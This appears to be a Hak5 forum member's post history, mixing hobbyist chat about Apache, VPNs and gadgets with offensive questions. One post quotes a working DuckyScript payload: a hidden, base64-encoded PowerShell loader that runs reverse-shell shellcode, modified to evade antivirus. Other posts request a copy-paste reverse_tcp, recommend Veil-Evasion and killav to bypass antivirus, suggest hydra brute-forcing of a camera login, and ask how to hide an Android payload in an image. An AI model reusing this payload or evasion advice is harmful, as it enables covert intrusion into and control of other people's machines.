.png.a24625454d7303a2a41e41575ef426b7.png)
datajumper
-
Posts
165 -
Joined
-
Last visited
-
Days Won
1
Posts posted by datajumper
-
-
hey guys i have been searching alot how to secure my apache server ...i have found libapache-modsecurity
the webserver is running on debian9 ...no gui lol
but i followed the guides ..to turne SecRuleEngine on
but when i do i try to restart ....service apache2 restart
and apache is just dead it the water lol so now im turning to you guys
maybe im not doing something right idk but i scanned my website with vega ...i know how to use lets encrypt i just havent done that part yet lol
but vega says my site has xss flaws and ssql and of course clear http ...bc i havent installed certbot yet
but can any of you all tell me or give me advice on how to secure my apache2 server ?? modsecurity and add owasp rules-crs ?? im having a hard time understanding
i really need help on this guys pls ..if i have been unclear because im not the best at explaining lol feel free to ask questions and ill try to explain better thanks in advance
-
On 7/9/2017 at 0:14 PM, digip said:
All your data belong to whoever owns the VPN. The VPN people own your traffic, shape it, injected/read/mangle, in other words, pwn all your shit. you don't put a free VPN, on a web property you own that you want protected. Especially if you can roll OpenVPN from an Amazon instance of your own already(as far as I know). This is true of any company VPN service for the most part, but free ones, are like free proxies. Free ones usually exist for a reason, and that's usually not "free" at the end of the day.
In the above instance if he needs remote access to his own servers, he can roll his own OpenVPN setup on amazon, or, just SSH into the system if he can setup SSH, which if probably already enabled. He could also proxychain and forward over SSH his own little subnet that bridges the two networks securely, which would be way safer than a free VPN services, which would cause all his server traffic to be open to the VPN network.
oh wow man i had no clue i didnt know i was using vpnbook with kali anonsurf = tor with using tor do you still think they looked at my data ? man i want to learn more about this and do you have a good guide for rolling your own vpn ? actually im going to research that right now thanx for the info sincerely i appreciate it thanks again digip
-
have you tried vpnbook ( google it ) all you do ist download the certificate pack the psswd is on the web site where you download it
once you download it just extract it choose wich port you want to use theres a few in that folder like udp25000 udp443 udp80
just pick wich one you want i am using udp25000 open a terminal sudo su or sudo -s
then its as simple as openvpn --config udp25000"file"
just type openvpn --config then drag and drop that file in your terminal once its started just minimize it you close the terminal you kill
you vpn but it works and its free the only downside is it dont support peer to peer downloading example like torrents bit torrent client
pirate bay "example lol" but if you are just wanting a good vpn here you go man : ) just download one of the certificate bundle's i actually
alternate between the euro one and the US one lol if you need hel holler : )
https://www.vpnbook.com/freevpn
-
the ip camera should just be setup like an access point if im not mistaken
i dont know how yours is set up but you can use aircrack-ng the normal way like you do cracking a router and as for the web login url
you should be able to use a wordlist and hydra to bruteforce email me or mssg me on here it dont matter send me all the info ill do
my best to help you oh lol i just skimmed over this forum i missed the part where you already have a handshake / pcap ? if thats correct we can use crunch or something to crack it then as for the log in use hydra either terminal command or hydra gtk ....for give me if i skiped over any info and answered incorrectly
-
ok man im here if you need anything i try to help lol bye 4 now
-
i am an amature at this but ....ill try to help lol if it dont help im sorry
do you have these packages installed ? ..........
-
python-m2crypto -
libgcrypt11 -
libgcrypt11-dev -
libnl-devdpkg -s python-m2crypto libgcrypt11 libgcrypt11-dev libnl-dev -
If not, to install:
apt-get install python-m2crypto libgcrypt11 libgcrypt11-dev libnl-devhttps://askubuntu.com/questions/597546/iwconfig-wlan0-txpower-30mw-not-workingits easier just to send u the link i found lolhttps://wireless.wiki.kernel.org/en/users/download https://www.kernel.org/pub/software/network/wireless-regdb/its got something to do with the cdra package is what everyone is saying i hope this helps if not just ignore me lol
-
-
11 minutes ago, Dave-ee Jones said:
Yeah, I've got a Synology RT1900ac for a home router. The newer one, RT2600ac is a monster router but no need to upgrade..I also have an ASUS router as well, but that's not doing too much.
Haha. It is a really long winded way :P
Yeah, I was saying that more of a joke, though the colours and general look of those things is a bit boring and overdone. A simple black box is far more inconspicuous right?..It's either that or someone seeing the word 'TP-Link' on a small white router-looking box..oh i get it man lol yeah im not too fond of the colors myself haha and idk why but i actually like the stock firmware on the asus ..the one i had ..i cant remember the model off the top of my head but i done every kind of test i could think of at that think then i even tried to brick it on purpose just for shits ang giggles and the asus was unbrickable i know thats irrealavent i just thought id throw that out there lol good luck brother
-
yeah lol i made the mistake of painting a yagi 2.4ghz antenna camouflage because i didnt want it to be seen ..but the paint had lead or something in it i guess
and needless to say it never worked right after that ..it done great b4 i painted it lol so yeah i agree with barry be careful about the paint
-
2 hours ago, Dave-ee Jones said:
Yeah, I did see them. They look alright, but TP-Link...and also, the first thing I would do if I got one of those is paint it a different colour lol.
right right lol
-
ive never used one of these but someone told me about them a year ago
TP-Link N300 Wireless Wi-Fi Nano
lol ...or
TP-Link N150 Wireless Wi-Fi Portable Router with Range Extender/Access Point/Client/Bridge Modes (TL-WR700N)
https://www.amazon.com/TP-Link-Wireless-Portable-Extender-TL-WR700N/dp/B006DEBYWU
you did say mini i guess it depends on your project
-
On 7/20/2016 at 5:12 PM, fugu said:
this is untested, but I rewrote the hashing that your exploit is using. instead of the ror13 hash that was being used, I changed it to ror12. on virustotal now, kaspersky is unable to detect it, but it could be cause I created a bug that I don't know about in the process, like I said, i haven't tested it.
DELAY 5000 GUI r DELAY 1000 STRING cmd ENTER DELAY 1000 STRING powershell -nop -win hidden -noni -enc JE9VazAgPSAnJHpRRUMgPSAnJ1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBWaXJ0dWFsQWxsb2MoSW50UHRyIGxwQWRkcmVzcywgdWludCBkd1NpemUsIHVpbnQgZmxBbGxvY2F0aW9uVHlwZSwgdWludCBmbFByb3RlY3QpO1tEbGxJbXBvcnQoImtlcm5lbDMyLmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBDcmVhdGVUaHJlYWQoSW50UHRyIGxwVGhyZWFkQXR0cmlidXRlcywgdWludCBkd1N0YWNrU2l6ZSwgSW50UHRyIGxwU3RhcnRBZGRyZXNzLCBJbnRQdHIgbHBQYXJhbWV0ZXIsIHVpbnQgZHdDcmVhdGlvbkZsYWdzLCBJbnRQdHIgbHBUaHJlYWRJZCk7W0RsbEltcG9ydCgibXN2Y3J0LmRsbCIpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBtZW1zZXQoSW50UHRyIGRlc3QsIHVpbnQgc3JjLCB1aW50IGNvdW50KTsnJzskdyA9IEFkZC1UeXBlIC1tZW1iZXJEZWZpbml0aW9uICR6UUVDIC1OYW1lICJXaW4zMiIgLW5hbWVzcGFjZSBXaW4zMkZ1bmN0aW9ucyAtcGFzc3RocnU7W0J5dGVbXV07W0J5dGVbXV0keiA9IDB4ZmMsMHhlOCwweDg5LDB4MDAsMHgwMCwweDAwLDB4NjAsMHg4OSwweGU1LDB4MzEsMHhkMiwweDY0LDB4OGIsMHg1MiwweDMwLDB4OGIsMHg1MiwweDBjLDB4OGIsMHg1MiwweDE0LDB4OGIsMHg3MiwweDI4LDB4MGYsMHhiNywweDRhLDB4MjYsMHgzMSwweGZmLDB4MzEsMHhjMCwweGFjLDB4M2MsMHg2MSwweDdjLDB4MDIsMHgyYywweDIwLDB4YzEsMHhjZiwweDBjLDB4MDEsMHhjNywweGUyLDB4ZjAsMHg1MiwweDU3LDB4OGIsMHg1MiwweDEwLDB4OGIsMHg0MiwweDNjLDB4MDEsMHhkMCwweDhiLDB4NDAsMHg3OCwweDg1LDB4YzAsMHg3NCwweDRhLDB4MDEsMHhkMCwweDUwLDB4OGIsMHg0OCwweDE4LDB4OGIsMHg1OCwweDIwLDB4MDEsMHhkMywweGUzLDB4NDksMHg4YiwweDM0LDB4OGIsMHgwMSwweGQ2LDB4MzEsMHhmZiwweDMxLDB4YzAsMHhhYywweGMxLDB4Y2YsMHgwYywweDAxLDB4YzcsMHgzOCwweGUwLDB4NzUsMHhmNCwweDAzLDB4N2QsMHhmOCwweDNiLDB4N2QsMHgyNCwweDc1LDB4ZTIsMHg1OCwweDhiLDB4NTgsMHgyNCwweDAxLDB4ZDMsMHg2NiwweDhiLDB4MGMsMHg0YiwweDhiLDB4NTgsMHgxYywweDAxLDB4ZDMsMHg4YiwweDA0LDB4OGIsMHgwMSwweGQwLDB4ODksMHg0NCwweDI0LDB4MjQsMHg1YiwweDViLDB4NjEsMHg1OSwweDVhLDB4NTEsMHhmZiwweGUwLDB4NTgsMHg1ZiwweDVhLDB4OGIsMHgxMiwweGViLDB4ODYsMHg1ZCwweDY4LDB4MzMsMHgzMiwweDAwLDB4MDAsMHg2OCwweDc3LDB4NzMsMHgzMiwweDVmLDB4NTQsMHg2OCwweDk2LDB4Y2UsMHhmMSwweDQ4LDB4ZmYsMHhkNSwweGI4LDB4OTAsMHgwMSwweDAwLDB4MDAsMHgyOSwweGM0LDB4NTQsMHg1MCwweDY4LDB4YzUsMHgzZiwweGIyLDB4ZDYsMHhmZiwweGQ1LDB4NTAsMHg1MCwweDUwLDB4NTAsMHg0MCwweDUwLDB4NDAsMHg1MCwweDY4LDB4ZTQsMHgzZSwweGJiLDB4ZGUsMHhmZiwweGQ1LDB4OTcsMHg2YSwweDA1LDB4NjgsMHhiMiwweDNlLDB4ZTksMHgwOSwweDY4LDB4MDIsMHgwMCwweDIwLDB4ZmIsMHg4OSwweGU2LDB4NmEsMHgxMCwweDU2LDB4NTcsMHg2OCwweDUzLDB4ZDcsMHhiZSwweGRjLDB4ZmYsMHhkNSwweDg1LDB4YzAsMHg3NCwweDBjLDB4ZmYsMHg0ZSwweDA4LDB4NzUsMHhlYywweDY4LDB4OGIsMHg0ZiwweDE2LDB4ZWMsMHhmZiwweGQ1LDB4NmEsMHgwMCwweDZhLDB4MDQsMHg1NiwweDU3LDB4NjgsMHg3MywweGEwLDB4ZGMsMHg2ZCwweGZmLDB4ZDUsMHg4YiwweDM2LDB4NmEsMHg0MCwweDY4LDB4MDAsMHgxMCwweDAwLDB4MDAsMHg1NiwweDZhLDB4MDAsMHg2OCwweGFlLDB4NTIsMHgyNiwweDk2LDB4ZmYsMHhkNSwweDkzLDB4NTMsMHg2YSwweDAwLDB4NTYsMHg1MywweDU3LDB4NjgsMHgwMiwweGQ5LDB4YzgsMHg1ZiwweGZmLDB4ZDUsMHgwMSwweGMzLDB4MjksMHhjNiwweDg1LDB4ZjYsMHg3NSwweGVjLDB4YzM7JGcgPSAweDEwMDA7aWYgKCR6Lkxlbmd0aCAtZ3QgMHgxMDAwKXskZyA9ICR6Lkxlbmd0aH07JEg4UUE9JHc6OlZpcnR1YWxBbGxvYygwLCRnLDB4MTAwMCwweDQwKTtmb3IgKCRpPTA7JGkgLWxlICgkei5MZW5ndGgtMSk7JGkrKykgeyR3OjptZW1zZXQoW0ludFB0cl0oJEg4UUEuVG9JbnQzMigpKyRpKSwgJHpbJGldLCAxKX07JHc6OkNyZWF0ZVRocmVhZCgwLDAsJEg4UUEsMCwwLDApO2ZvciAoOzspe1N0YXJ0LXNsZWVwIDYwfTsnOyRlID0gW1N5c3RlbS5Db252ZXJ0XTo6VG9CYXNlNjRTdHJpbmcoW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VW5pY29kZS5HZXRCeXRlcygkT1VrMCkpOyRDWEc3ID0gIi1lbmMgIjtpZihbSW50UHRyXTo6U2l6ZSAtZXEgOCl7JFRZNCA9ICRlbnY6U3lzdGVtUm9vdCArICJcc3lzd293NjRcV2luZG93c1Bvd2VyU2hlbGxcdjEuMFxwb3dlcnNoZWxsIjtpZXggIiYgJFRZNCAkQ1hHNyAkZSJ9ZWxzZXs7aWV4ICImIHBvd2Vyc2hlbGwgJENYRzcgJGUiO30K ENTER
after STRING powershell -nop -win hidden -noni -enc then add shellcode .........can that be converted to digispark ....like using duckuino converter??
im having problems adding my shellcode due to lack of space on the digispark is there any examples you can give me i just need a small reverse_tcp script to run on the digispark would you care to help me ? some guys on here gave me a few examples but when i use msfvenom to generate the shellcode its way to big i need help either to make it smaller or another method all together and plz keep in mind even tho ive been using metasploit 4 a while im still a noob with all of this rubberducky and digispark programming stuff ...a copy and paste example would be nice lol the saying goes bigger is always better lol not in this case i need smaller
-
On 6/14/2017 at 6:21 PM, Dave-ee Jones said:
World ends = not world ends?? What you talkin' bout, Willis? There'll be no devices or power or anything..
lmao .......
-
if you use metasploit to gain a reverse_tcp connection once you gain a meterpreter session you can run the killav command
but if the problem is that you cant get past the antivirus to drop your shell code or payload you can try Veil-Evasion
create a payload with veil it has an option to encode ruby into your payload and several other methods
or if you have physical accsess to the keyboard of the target machine and if you have enough time norton should be running in the bottom right
hand corner just right click on the norton icon it should have a disable sheilds button .....disable it temporarely until you get whatever it is that you was trying to do
but veil-evasion works 4 me gain a reverse tcp session then you are back doored in .... my recent exploit ...what i did was i had my metasploit listener setup at home
then i put my veil-evasion payload on to a regular usb thumb drive and went to a friends house "i had permision lol" and i put it in the machine right clicked on the veil evasion payload and chose run as administrator and it walked past the antivirus no problem and i had my phone ssh 'd into my listening machine at home so i had full control on the go .......i know this isnt probably what you were looking for i hope it helped ...if not theres some really smart really experienced pentesters on this forum just hang around be patient one of these guys should be able to help
-
oh man ive been thinking of doing this for a while ...if i can do it cheap enough im going 4 it lol
you guys are awsome ! .... can this be done with a rtl sdr like the one darren kitchen had ? i think its like 20 bucks
i only ask because i seen the link that dave ee jones posted about the evil socket but this is a great project if we can
accomplish it i mean because everyone is going to cell phone my girlfriend doesnt even get on her laptop anymore at all
good luck getting me to give up my laptop / desktop's lol ill be running linux til the world ends thanks 4 the idea thumbs up !!!
-
im sorry just one more question and i will leave u alone can i intercept phone calls and sms with the sdr ? or is that a stupid question ?'
-
oh ok so just an sdr ... ok cool ...so u said i cant actually attack the network like aircrack mdk3 ect ? thanks barry this gives me a better idea
so basically if im getting this right i can look but not touch or listen i should say lol ive googled this and ive found some info uhmm but the guys are using these really
expensive multi freq adapter like a huge box with all kinds of antennas lol but i have yet to find any attacks like aircrack like i mentioned but thank u so much again
-
guys im still learning im really new to gsm 1900 mhz ....my question is and i dont mean to sound stupid but
if i get a gsm antenna what wireless adapter or equiptment do i need example like i have an alfa wireless adapter that i can put into monitor mode
ect we all know how to sniff traffic on 2.4 ghz but how do i do the same thing with gsm signals or cdma for that matter i want to be on cell network
like i do on 2.4ghz deauth clients so forth is there an affordable adapter like the alfa ive been looking but like i found this one it was like 300 dollars i just
want a simple way to sniff gsm traffic and once i get the equiptment what software do i use ...will aircrack work on gsm network ? if im unclear wich im sure i am
i will try my best to clarify my question ...just ask and as always guys thanks in advance ..i dont know unless i ask
-
4 hours ago, datajumper said:
hey guys ive been exploiting my OWN !!! tablet and phone recently my phone is running marshmellow 6.0.1 the tablet uhmm ...kit kat ? something lol 4.4 i think lol
ok ive created a payload with msfvenom and made the .apk payload and u have to accept the permisions and install and open the payload to run the binary right ?? ok
what i want to know is just like in windows u can create shellcode and drop it into the cmd or drop it into a jpg file and it just runs your binary no questions asked lol
is there any way to run somekind of shellcode "like" payload on android so i can send the payload via sms or email ect ... so when the user clicks on it it just runs the binary ?
so basically what i would like is to embed a payload for android into a jpg /jpeg/png it has to be a picture i know about the pdf deal i want to do this with a picture ...if ive been unclear in any way feel free to ask i will try my best to explain better of what i want thanks in advance
i cant wait to hear all your feed back good or bad i accept it all ty ....and special thanks to the whole hak5 community for just being here u all are great who else would i be able to ask questions like this to lmao
i guess what im asking is there a payload i can drop on a device and all you have to do is open it without permisions ..install like a app ? just by opening it
-
hey guys ive been exploiting my OWN !!! tablet and phone recently my phone is running marshmellow 6.0.1 the tablet uhmm ...kit kat ? something lol 4.4 i think lol
ok ive created a payload with msfvenom and made the .apk payload and u have to accept the permisions and install and open the payload to run the binary right ?? ok
what i want to know is just like in windows u can create shellcode and drop it into the cmd or drop it into a jpg file and it just runs your binary no questions asked lol
is there any way to run somekind of shellcode "like" payload on android so i can send the payload via sms or email ect ... so when the user clicks on it it just runs the binary ?
so basically what i would like is to embed a payload for android into a jpg /jpeg/png it has to be a picture i know about the pdf deal i want to do this with a picture ...if ive been unclear in any way feel free to ask i will try my best to explain better of what i want thanks in advance
i cant wait to hear all your feed back good or bad i accept it all ty ....and special thanks to the whole hak5 community for just being here u all are great who else would i be able to ask questions like this to lmao
-
thats actually what i was looking for is irc but i need to know more about irc traffic ...how easy can it be cracked is it encrypted ?
can anyone sniff it i want to talk as comfortably as im talking to you now n0rpg0d
and i agree these apps freak me out as well do u have any suggestions on wich irc client to go with ?
im runnung ubuntu behind a pfsense firewall .. and remember ive seen irc a bunch but ive never used it i dont know what to use
is xchat safe ? i dont want no one sniffing my conversations is all lol ty very much for the feedback all of u all i dont know what i'd do without
my community
-
hey guys i want to get your opinion
i want a touch screen dash like most of the newer vehicles out there i drive a 2002 chevy tahoe and it has a din and a half stereo
i want to find a touch screen that will fit in the dash without modification lol no grinding the screen needs to be hdmi or run off gpio it just has to work
with raspberry pi thats the first issue " the screen display and i absolutly want touch screen " no keyboard / mouse lol second issue im trying to figure out is fm reciever
for the raspberry pi i'd like for it to use the factory antenna jack standard on all stereos and third issue is if i take up all the space in the dash with the screen i want to access the usb ports
i can get a usb extention cable but i donk know where i could mount it lol ....guys just please comment and if u all come accross something that u think will work 4 me please send me the links as always thanks in advance i appreciate each and every one of you thanks for being here : )
-
3 hours ago, Mr-Protocol said:
awsome stuff
-
i will check that out ty so much but if that works i will use it but i was looking for something more cli based in linux
but if that works ill go with it ty ty ty so so much : )
-
ok guy me and a couple of friends was wanting some opinions
what we want is some kind of comunications that is 100% private ...we was thinking about irc
what do u all think it needs to be encrypted traffic ?? or something we just want to chat and nobody can see what we talk about
i've never even used irc im kinda new to it ...i know its been around forever but i'd like to know what you guys think
thanks in advance
Free wifi
in Everything Else
Posted
lmao thats funny as hell @fernandoblazin good reply hahahah